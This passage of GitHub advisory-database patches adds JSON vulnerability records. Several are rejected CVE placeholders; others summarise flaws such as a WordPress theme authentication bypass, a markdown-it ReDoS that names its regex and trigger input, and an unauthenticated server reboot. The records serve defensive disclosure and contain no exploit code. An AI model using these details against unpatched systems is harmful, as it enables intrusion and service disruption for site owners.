"CVE-2026-1729" + ], + "details": "The AdForest theme for WordPress is vulnerable to authentication bypass in all versions up to, and including, 6.0.12. This is due to the plugin not properly verifying a user's identity prior to authenticating them through the 'sb_login_user_with_otp_fun' function. This makes it possible for unauthenticated attackers to log in as arbitrary users, including administrators.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1729" + }, + { + "type": "WEB", + "url": "https://themeforest.net/item/adforest-classified-wordpress-theme/19481695" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/34fd42cb-3868-4b1c-bc56-575faf01e8f3?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T02:15:48Z" + } +} \ No newline at end of file From 31dbff1f20fae5ca56ca07b02c8be55cd9c51e97 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 06:31:37 +0000 Subject: [PATCH 028/215] Publish Advisories GHSA-2m33-4rpr-vp6w GHSA-36cv-hm28-66xc GHSA-38c4-r59v-3vqw GHSA-4x22-rf55-6p54 GHSA-5g72-9h25-j64h GHSA-9f79-6fpr-26f7 GHSA-cpfx-wfqx-68j7 GHSA-gffm-5vqv-gr22 GHSA-m7p7-gcp5-wr3w GHSA-mf8p-696r-4h8h GHSA-wcj5-w68q-pq29 GHSA-wj6w-x5qq-4qqw GHSA-wqhx-vh8g-2934 GHSA-xqfh-gx6q-m574 --- .../GHSA-2m33-4rpr-vp6w.json | 25 +++++++++ .../GHSA-36cv-hm28-66xc.json | 25 +++++++++ .../GHSA-38c4-r59v-3vqw.json | 52 +++++++++++++++++++ .../GHSA-4x22-rf55-6p54.json | 25 +++++++++ .../GHSA-5g72-9h25-j64h.json | 44 ++++++++++++++++ .../GHSA-9f79-6fpr-26f7.json | 44 ++++++++++++++++ .../GHSA-cpfx-wfqx-68j7.json | 25 +++++++++ .../GHSA-gffm-5vqv-gr22.json | 25 +++++++++ .../GHSA-m7p7-gcp5-wr3w.json | 44 ++++++++++++++++ .../GHSA-mf8p-696r-4h8h.json | 44 ++++++++++++++++ .../GHSA-wcj5-w68q-pq29.json | 25 +++++++++ .../GHSA-wj6w-x5qq-4qqw.json | 29 +++++++++++ .../GHSA-wqhx-vh8g-2934.json | 25 +++++++++ .../GHSA-xqfh-gx6q-m574.json | 25 +++++++++ 14 files changed, 457 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-2m33-4rpr-vp6w/GHSA-2m33-4rpr-vp6w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-36cv-hm28-66xc/GHSA-36cv-hm28-66xc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4x22-rf55-6p54/GHSA-4x22-rf55-6p54.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5g72-9h25-j64h/GHSA-5g72-9h25-j64h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9f79-6fpr-26f7/GHSA-9f79-6fpr-26f7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cpfx-wfqx-68j7/GHSA-cpfx-wfqx-68j7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gffm-5vqv-gr22/GHSA-gffm-5vqv-gr22.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m7p7-gcp5-wr3w/GHSA-m7p7-gcp5-wr3w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mf8p-696r-4h8h/GHSA-mf8p-696r-4h8h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wcj5-w68q-pq29/GHSA-wcj5-w68q-pq29.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wj6w-x5qq-4qqw/GHSA-wj6w-x5qq-4qqw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wqhx-vh8g-2934/GHSA-wqhx-vh8g-2934.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xqfh-gx6q-m574/GHSA-xqfh-gx6q-m574.json diff --git a/advisories/unreviewed/2026/02/GHSA-2m33-4rpr-vp6w/GHSA-2m33-4rpr-vp6w.json b/advisories/unreviewed/2026/02/GHSA-2m33-4rpr-vp6w/GHSA-2m33-4rpr-vp6w.json new file mode 100644 index 0000000000000..11e66ae5de085 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2m33-4rpr-vp6w/GHSA-2m33-4rpr-vp6w.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2m33-4rpr-vp6w", + "modified": "2026-02-12T06:30:13Z", + "published": "2026-02-12T06:30:13Z", + "aliases": [ + "CVE-2026-26088" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26088" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T05:17:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-36cv-hm28-66xc/GHSA-36cv-hm28-66xc.json b/advisories/unreviewed/2026/02/GHSA-36cv-hm28-66xc/GHSA-36cv-hm28-66xc.json new file mode 100644 index 0000000000000..ba272a9fdbefb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-36cv-hm28-66xc/GHSA-36cv-hm28-66xc.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-36cv-hm28-66xc", + "modified": "2026-02-12T06:30:13Z", + "published": "2026-02-12T06:30:13Z", + "aliases": [ + "CVE-2026-26089" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26089" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T05:17:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json b/advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json new file mode 100644 index 0000000000000..89a716520ae70 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-38c4-r59v-3vqw", + "modified": "2026-02-12T06:30:13Z", + "published": "2026-02-12T06:30:13Z", + "aliases": [ + "CVE-2026-2327" + ], + "details": "Versions of the package markdown-it from 13.0.0 and before 14.1.1 are vulnerable to Regular Expression Denial of Service (ReDoS) due to the use of the regex /\\*+$/ in the linkify function. An attacker can supply a long sequence of * characters followed by a non-matching character, which triggers excessive backtracking and may lead to a denial-of-service condition.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2327" + }, + { + "type": "WEB", + "url": "https://github.com/markdown-it/markdown-it/commit/4b4bbcae5e0990a5b172378e507b33a59012ed26" + }, + { + "type": "WEB", + "url": "https://gist.github.com/ltduc147/c9abecae1b291ede4f692f2ab988c917" + }, + { + "type": "WEB", + "url": "https://github.com/markdown-it/markdown-it/blob/14.1.0/lib/rules_inline/linkify.mjs%23L33" + }, + { + "type": "WEB", + "url": "https://security.snyk.io/vuln/SNYK-JS-MARKDOWNIT-10666750" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1333" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T06:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4x22-rf55-6p54/GHSA-4x22-rf55-6p54.json b/advisories/unreviewed/2026/02/GHSA-4x22-rf55-6p54/GHSA-4x22-rf55-6p54.json new file mode 100644 index 0000000000000..a97e70a3085ed --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4x22-rf55-6p54/GHSA-4x22-rf55-6p54.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4x22-rf55-6p54", + "modified": "2026-02-12T06:30:13Z", + "published": "2026-02-12T06:30:13Z", + "aliases": [ + "CVE-2026-26086" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26086" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T05:17:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5g72-9h25-j64h/GHSA-5g72-9h25-j64h.json b/advisories/unreviewed/2026/02/GHSA-5g72-9h25-j64h/GHSA-5g72-9h25-j64h.json new file mode 100644 index 0000000000000..a60c2057ea321 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5g72-9h25-j64h/GHSA-5g72-9h25-j64h.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5g72-9h25-j64h", + "modified": "2026-02-12T06:30:13Z", + "published": "2026-02-12T06:30:13Z", + "aliases": [ + "CVE-2026-1537" + ], + "details": "The LatePoint – Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the load_step() function in all versions up to, and including, 5.2.6. This makes it possible for unauthenticated attackers to view booking information including customer names, email addresses, phone numbers, appointment times, and service details.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1537" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/latepoint/tags/5.2.5/lib/helpers/steps_helper.php#L231" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/latepoint/tags/5.2.5/lib/models/model.php#L562" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c18ad885-52a8-467b-83f2-aeb0c8be8be0?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T04:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9f79-6fpr-26f7/GHSA-9f79-6fpr-26f7.json b/advisories/unreviewed/2026/02/GHSA-9f79-6fpr-26f7/GHSA-9f79-6fpr-26f7.json new file mode 100644 index 0000000000000..209805f6ac5a9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9f79-6fpr-26f7/GHSA-9f79-6fpr-26f7.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9f79-6fpr-26f7", + "modified": "2026-02-12T06:30:13Z", + "published": "2026-02-12T06:30:13Z", + "aliases": [ + "CVE-2026-26234" + ], + "details": "JUNG Smart Visu Server 1.1.1050 contains a request header manipulation vulnerability that allows unauthenticated attackers to override request URLs by injecting arbitrary values in the X-Forwarded-Host header. Attackers can manipulate proxied requests to generate tainted responses, enabling cache poisoning, potential phishing, and redirecting users to malicious domains.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26234" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/jung-smart-visu-server-improper-neutralization-of-http-headers-for-scripting-syntax" + }, + { + "type": "WEB", + "url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5970.php" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-644" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T04:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cpfx-wfqx-68j7/GHSA-cpfx-wfqx-68j7.json b/advisories/unreviewed/2026/02/GHSA-cpfx-wfqx-68j7/GHSA-cpfx-wfqx-68j7.json new file mode 100644 index 0000000000000..8ff1592337c85 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cpfx-wfqx-68j7/GHSA-cpfx-wfqx-68j7.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cpfx-wfqx-68j7", + "modified": "2026-02-12T06:30:13Z", + "published": "2026-02-12T06:30:13Z", + "aliases": [ + "CVE-2026-26087" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26087" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T05:17:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gffm-5vqv-gr22/GHSA-gffm-5vqv-gr22.json b/advisories/unreviewed/2026/02/GHSA-gffm-5vqv-gr22/GHSA-gffm-5vqv-gr22.json new file mode 100644 index 0000000000000..c63c7ca070de3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gffm-5vqv-gr22/GHSA-gffm-5vqv-gr22.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gffm-5vqv-gr22", + "modified": "2026-02-12T06:30:13Z", + "published": "2026-02-12T06:30:13Z", + "aliases": [ + "CVE-2026-26090" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26090" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T05:17:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m7p7-gcp5-wr3w/GHSA-m7p7-gcp5-wr3w.json b/advisories/unreviewed/2026/02/GHSA-m7p7-gcp5-wr3w/GHSA-m7p7-gcp5-wr3w.json new file mode 100644 index 0000000000000..dd6f9c2e2aacc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m7p7-gcp5-wr3w/GHSA-m7p7-gcp5-wr3w.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m7p7-gcp5-wr3w", + "modified": "2026-02-12T06:30:13Z", + "published": "2026-02-12T06:30:13Z", + "aliases": [ + "CVE-2026-25676" + ], + "details": "The installer of M-Track Duo HD version 1.0.0 contains an issue with the DLL search path, which may lead to insecurely loading Dynamic Link Libraries. As a result, arbitrary code may be executed with administrator privileges.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25676" + }, + { + "type": "WEB", + "url": "https://jvn.jp/en/jp/JVN88690363" + }, + { + "type": "WEB", + "url": "https://www.m-audio.com/audio-midi-interfaces/m-track-duo-hd.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T05:17:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mf8p-696r-4h8h/GHSA-mf8p-696r-4h8h.json b/advisories/unreviewed/2026/02/GHSA-mf8p-696r-4h8h/GHSA-mf8p-696r-4h8h.json new file mode 100644 index 0000000000000..5ad02797f1bf9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mf8p-696r-4h8h/GHSA-mf8p-696r-4h8h.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mf8p-696r-4h8h", + "modified": "2026-02-12T06:30:13Z", + "published": "2026-02-12T06:30:13Z", + "aliases": [ + "CVE-2026-26235" + ], + "details": "JUNG Smart Visu Server 1.1.1050 contains a denial of service vulnerability that allows unauthenticated attackers to remotely shutdown or reboot the server. Attackers can send a single POST request to trigger the server reboot without requiring any authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26235" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/jung-smart-visu-server-jung-smart-visu-server-missing-authentication" + }, + { + "type": "WEB", + "url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5971.php" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T04:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wcj5-w68q-pq29/GHSA-wcj5-w68q-pq29.json b/advisories/unreviewed/2026/02/GHSA-wcj5-w68q-pq29/GHSA-wcj5-w68q-pq29.json new file mode 100644 index 0000000000000..c294f088038d2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wcj5-w68q-pq29/GHSA-wcj5-w68q-pq29.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wcj5-w68q-pq29", + "modified": "2026-02-12T06:30:13Z", + "published": "2026-02-12T06:30:13Z", + "aliases": [ + "CVE-2026-26092" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26092" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T05:17:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wj6w-x5qq-4qqw/GHSA-wj6w-x5qq-4qqw.json b/advisories/unreviewed/2026/02/GHSA-wj6w-x5qq-4qqw/GHSA-wj6w-x5qq-4qqw.json new file mode 100644 index 0000000000000..43ffb82003f0c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wj6w-x5qq-4qqw/GHSA-wj6w-x5qq-4qqw.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wj6w-x5qq-4qqw", + "modified": "2026-02-12T06:30:13Z", + "published": "2026-02-12T06:30:13Z", + "aliases": [ + "CVE-2025-14892" + ], + "details": "The Prime Listing Manager WordPress plugin through 1.1 allows an attacker to gain administrative access without having any kind of account on the targeted site and perform unauthorized actions due to a hardcoded secret.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14892" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/d12332ec-1d0c-4ff5-94e0-7c4470bdb79c" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T06:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wqhx-vh8g-2934/GHSA-wqhx-vh8g-2934.json b/advisories/unreviewed/2026/02/GHSA-wqhx-vh8g-2934/GHSA-wqhx-vh8g-2934.json new file mode 100644 index 0000000000000..0c00f56edeb4b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wqhx-vh8g-2934/GHSA-wqhx-vh8g-2934.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wqhx-vh8g-2934", + "modified": "2026-02-12T06:30:13Z", + "published": "2026-02-12T06:30:13Z", + "aliases": [ + "CVE-2026-26091" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26091" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T05:17:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xqfh-gx6q-m574/GHSA-xqfh-gx6q-m574.json b/advisories/unreviewed/2026/02/GHSA-xqfh-gx6q-m574/GHSA-xqfh-gx6q-m574.json new file mode 100644 index 0000000000000..06ee1c8db6d20 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xqfh-gx6q-m574/GHSA-xqfh-gx6q-m574.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xqfh-gx6q-m574", + "modified": "2026-02-12T06:30:13Z", + "published": "2026-02-12T06:30:13Z", + "aliases": [ + "CVE-2026-26085" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26085" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T05:17:06Z" + } +} \ No newline at end of file From 255476e69bb2af3b71982eedd68c3753c80d6f63 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 09:32:40 +0000 Subject: [PATCH 029/215] Publish Advisories GHSA-7wph-5wjx-7rgv GHSA-jc2j-hqm3-7764 GHSA-hvc5-q4hr-frqx GHSA-wpg2-262c-j98f GHSA-7v48-2x62-5ff3 GHSA-r76g-qww9-ch8r GHSA-2m44-r2x5-4q79 GHSA-q35m-cwfx-j6jx GHSA-72w6-32c7-vf7p GHSA-r6cc-j9rp-4f85 GHSA-3f33-44xm-29m7 GHSA-cqp7-wf4c-3xgc GHSA-g666-g65w-p8mh --- .../GHSA-7wph-5wjx-7rgv.json | 6 +++- .../GHSA-jc2j-hqm3-7764.json | 10 +++++- .../GHSA-hvc5-q4hr-frqx.json | 18 +++++++++- .../GHSA-wpg2-262c-j98f.json | 6 +++- .../GHSA-7v48-2x62-5ff3.json | 6 +++- .../GHSA-r76g-qww9-ch8r.json | 18 +++++++++- .../GHSA-2m44-r2x5-4q79.json | 6 +++- .../GHSA-q35m-cwfx-j6jx.json | 6 +++- .../GHSA-72w6-32c7-vf7p.json | 10 +++++- .../GHSA-r6cc-j9rp-4f85.json | 10 +++++- .../GHSA-3f33-44xm-29m7.json | 34 ++++++++++++++++++ .../GHSA-cqp7-wf4c-3xgc.json | 34 ++++++++++++++++++ .../GHSA-g666-g65w-p8mh.json | 36 +++++++++++++++++++ 13 files changed, 190 insertions(+), 10 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-3f33-44xm-29m7/GHSA-3f33-44xm-29m7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cqp7-wf4c-3xgc/GHSA-cqp7-wf4c-3xgc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g666-g65w-p8mh/GHSA-g666-g65w-p8mh.json diff --git a/advisories/unreviewed/2024/07/GHSA-7wph-5wjx-7rgv/GHSA-7wph-5wjx-7rgv.json b/advisories/unreviewed/2024/07/GHSA-7wph-5wjx-7rgv/GHSA-7wph-5wjx-7rgv.json index b9d944f2a94fe..4f9463663bc59 100644 --- a/advisories/unreviewed/2024/07/GHSA-7wph-5wjx-7rgv/GHSA-7wph-5wjx-7rgv.json +++ b/advisories/unreviewed/2024/07/GHSA-7wph-5wjx-7rgv/GHSA-7wph-5wjx-7rgv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7wph-5wjx-7rgv", - "modified": "2026-02-06T18:30:26Z", + "modified": "2026-02-12T09:30:58Z", "published": "2024-07-29T18:30:40Z", "aliases": [ "CVE-2024-42079" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/5f6a84cfb33b34610623857bd93919dcb661e29b" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c3c5cfa3170c0940bc66a142859caac07d19b9d6" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/f54f9d5368a4e92ede7dd078a62788dae3a7c6ef" diff --git a/advisories/unreviewed/2025/05/GHSA-jc2j-hqm3-7764/GHSA-jc2j-hqm3-7764.json b/advisories/unreviewed/2025/05/GHSA-jc2j-hqm3-7764/GHSA-jc2j-hqm3-7764.json index 0801106afd106..b0daeb210f883 100644 --- a/advisories/unreviewed/2025/05/GHSA-jc2j-hqm3-7764/GHSA-jc2j-hqm3-7764.json +++ b/advisories/unreviewed/2025/05/GHSA-jc2j-hqm3-7764/GHSA-jc2j-hqm3-7764.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jc2j-hqm3-7764", - "modified": "2026-01-17T18:30:19Z", + "modified": "2026-02-12T09:30:58Z", "published": "2025-05-08T09:30:25Z", "aliases": [ "CVE-2025-37822" @@ -31,9 +31,17 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/7d1d19a11cfbfd8bae1d89cc010b2cc397cd0c48" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b6d8d4d01ca8514fa89b05355f296758a91e2297" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/bcf6d3158c5902d92b6d62335af4422b7bf7c4e2" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/be6d98766ac952d38241d5a5b213f363afa421c3" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/07/GHSA-hvc5-q4hr-frqx/GHSA-hvc5-q4hr-frqx.json b/advisories/unreviewed/2025/07/GHSA-hvc5-q4hr-frqx/GHSA-hvc5-q4hr-frqx.json index a161b4069c6f5..58f8293637364 100644 --- a/advisories/unreviewed/2025/07/GHSA-hvc5-q4hr-frqx/GHSA-hvc5-q4hr-frqx.json +++ b/advisories/unreviewed/2025/07/GHSA-hvc5-q4hr-frqx/GHSA-hvc5-q4hr-frqx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hvc5-q4hr-frqx", - "modified": "2025-11-18T18:32:46Z", + "modified": "2026-02-12T09:30:58Z", "published": "2025-07-04T15:31:09Z", "aliases": [ "CVE-2025-38201" @@ -23,6 +23,18 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/0ab3de047808f375a36cd345225572eb3366f3c6" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1fe27f97944017a9d3c5af4d6d95282bff0f1147" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4abccfb61f422300be014b8e734c63344306f009" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/80417057ac60dd80f4816eb426e4e4a5bf696534" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/b85e3367a5716ed3662a4fe266525190d2af76df" @@ -30,6 +42,10 @@ { "type": "WEB", "url": "https://git.kernel.org/stable/c/d2768016f091f8a5264076b433fd7c3fabb6eb97" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/df524a68d9021c1401965d610bb6e42ee5d9611e" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/07/GHSA-wpg2-262c-j98f/GHSA-wpg2-262c-j98f.json b/advisories/unreviewed/2025/07/GHSA-wpg2-262c-j98f/GHSA-wpg2-262c-j98f.json index 